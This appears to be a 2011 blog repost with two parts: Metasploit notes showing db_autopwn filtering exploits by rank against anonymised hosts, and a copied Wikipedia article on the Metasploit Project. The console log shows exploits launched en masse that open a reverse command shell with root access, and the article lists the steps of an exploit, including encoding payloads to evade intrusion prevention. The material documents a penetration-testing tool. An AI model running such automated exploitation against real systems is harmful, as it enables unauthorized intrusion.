
[-] This exploit is below the minimum rank, 'excellent'.
[-] If you really want to run it, do 'exploit -f' or
[-] setg MinimumRank to something lower ('manual' is
[-] the lowest and would allow running all exploits).

The exploit automation features in Metasploit have been updated to accept a minimum rank value as well. From the nexpose_scan or db_autopwn commands, the "-R" parameter can be used to specify the minimum rank. This instructs the exploit matching algorithm to only run exploits with that rank or better, which not only speeds up the exploit process, but reduces the chance that the target machines and services will crash. The example below shows db_autopwn being used with a NeXpose scan import to only target vulnerabilities where the exploit is ranked excellent:

msf exploit(psexec) > db_autopwn -b -x -t
[*] XX.YY.44.223:1220 exploit/unix/webapp/qtss_parse_xml_exec (CVE-2003-0050, BID-6954)
[*] XX.YY.41.188:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.77.234:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.47.203:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.37.182:139 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.32.2:445 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.35.195:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.32.2:139 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.44.223:139 exploit/solaris/samba/trans2open (CVE-2003-0201, BID-7294)
[*] XX.YY.44.223:139 exploit/multi/samba/nttrans (CVE-2003-0085, BID-7106)
[*] XX.YY.47.203:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.47.203:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] XX.YY.72.243:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.72.243:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] XX.YY.37.182:445 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.34.236:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.41.188:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.41.188:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)


msf exploit(psexec) > db_autopwn -b -x -t -R excellent
[*] XX.YY.44.223:1220 exploit/unix/webapp/qtss_parse_xml_exec (CVE-2003-0050, BID-6954)
[*] XX.YY.77.234:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.35.195:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)


msf exploit(psexec) > db_autopwn -b -x -R excellent -e
[*] (1/3 [0 sessions]): Launching exploit/unix/webapp/qtss_parse_xml_exec against XX.YY.44.223:1220...
[*] (2/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.77.234:445...
[*] (3/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.35.195:445...
[*] (3/3 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] Command shell session 1 opened (192.168.198.128:45146 -> XX.YY.44.223:32554)
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] The autopwn command has completed with 1 sessions


Active sessions
===============
Id Description Tunnel Via
-- ----------- ------ ---
1 Command shell 192.168.198.128:45146 -> XX.YY.44.223:32554 unix/webapp/qtss_parse_xml_exec

msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...

uname -a
Darwin mactgts 5.5 Darwin Kernel Version 5.5: Thu May 30 14:51:26 PDT 2002; root:xnu/xnu-201.42.3.obj~1/RELEASE_PPC Power Macintosh powerpc

id
uid=0(root) gid=0(wheel) groups=0(wheel)
Posted by Triany
2011. 9. 29. 12:18

Metasploit Project

From Wikipedia, the free encyclopedia
Jump to: navigation, search
Metasploit Framework
screenshot
"Point. Click. Root."
Developer(s) Rapid7 LLC
Stable release 4.0 / August 1, 2011; 58 days ago (2011-08-01)
Development status Active
Operating system Cross-platform
Type Security
License BSD
Website http://www.metasploit.com/

The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.

The Metasploit Project is also well-known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

Metasploit was created by HD Moore in 2003 as a portable network tool using the Perl scripting language. Later, the Metasploit Framework was then completely rewritten in the Ruby programming language.[1] In addition, it is a tool for third-party security researchers to investigate potential vulnerabilities. On October 21, 2009 the Metasploit Project announced[2] that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.

Like comparable commercial products such as Immunity's Canvas or Core Security Technologies' Core Impact, Metasploit can be used to test the vulnerability of computer systems to protect them, and it can be used to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities. Since the acquisition of the Metasploit Framework, Rapid7 has added two open core proprietary editions called Metasploit Express and Metasploit Pro.

Metasploit's emerging position as the de facto exploit development framework[3] has led in recent times to the release of software vulnerability advisories often accompanied by a third party Metasploit exploit module that highlights the exploitability, risk, and remediation of that particular bug.[4][5] Metasploit 3.0 (Ruby language) is also beginning to include fuzzing tools, to discover software vulnerabilities, rather than merely writing exploits for currently public bugs. This new avenue has been seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November 2006. Metasploit 4.0 was released in August 2011.

Contents

[hide]

[edit] Metasploit Framework

The basic steps for exploiting a system using the Framework include -

  1. Choosing and configuring an exploit (code that enters a target system by taking advantage of one of its bugs; about 300 different exploits for Windows, Unix/Linux and Mac OS X systems are included);
  2. Checking whether the intended target system is susceptible to the chosen exploit (optional);
  3. Choosing and configuring a payload (code that will be executed on the target system upon successful entry, for instance a remote shell or a VNC server);
  4. Choosing the encoding technique to encode the payload so that the intrusion-prevention system (IPS) will not catch the encoded payload;
  5. Executing the exploit.

This modularity of allowing to combine any exploit with any payload is the major advantage of the Framework: it facilitates the tasks of attackers, exploit writers, and payload writers.

Versions of the Metasploit Framework since v3.0 are written in the Ruby programming language. The previous version 2.7, was implemented in Perl. It runs on all versions of Unix (including Linux and Mac OS X), and also on Windows. It includes two command-line interfaces, a web-based interface and a native GUI. The web interface is intended to be run from the attacker's computer. The Metasploit Framework can be extended to use external add-ons in multiple languages.

To choose an exploit and payload, some information about the target system is needed such as operating system version and installed network services. This information can be gleaned with port scanning and OS fingerprinting tools such as nmap. Vulnerability scanners such as NeXpose or Nessus can detect the target system vulnerabilities. Metasploit can import vulnerability scan data and compare the identified vulnerabilities to existing exploit modules for accurate exploitation.

[edit] Metasploit Express

In April 2010, Rapid7 released Metasploit Express, an open-core commercial edition for security teams who need to verify vulnerabilities.[6] Built on the Metasploit Framework, it offers a graphical user interface, integrates nmap for discovery, and adds smart bruteforcing as well as automated evidence collection.[7] Rapid7 offers a 7-day trial for Metasploit Express.[8]

[edit] Metasploit Pro

In October 2010, Rapid7 added Metasploit Pro, an open-core commercial Metasploit edition for penetration testers.[9] Metasploit Pro includes all features of Metasploit Express and adds web application scanning and exploitation, social engineering campaigns, and VPN pivoting.[10] Metasploit Pro is available as a 7-day trial.[11]

[edit] Payloads

Metasploit offers many types of payloads, including:

  • Command shell enables users to run collection scripts or run arbitrary commands against the host.
  • Meterpreter enables users to control the screen of a device using VNC and to browse, upload and download files.

[edit] Opcode Database

The Opcode Database is an important resource for writers of new exploits. Buffer overflow exploits on Windows often require precise knowledge of the position of certain machine language opcodes in the attacked program or included DLLs. These positions differ in the various versions and patch-levels of a given operating system, and they are all documented and conveniently searchable in the Opcode Database. This allows one to write buffer overflow exploits which work across different versions of the target operating system.

[edit] Shellcode Database

The Shellcode database contains the payloads (also known as shellcode) used by the Metasploit Framework. These are written in assembly language and full source code is available.

[edit] See also

Posted by Triany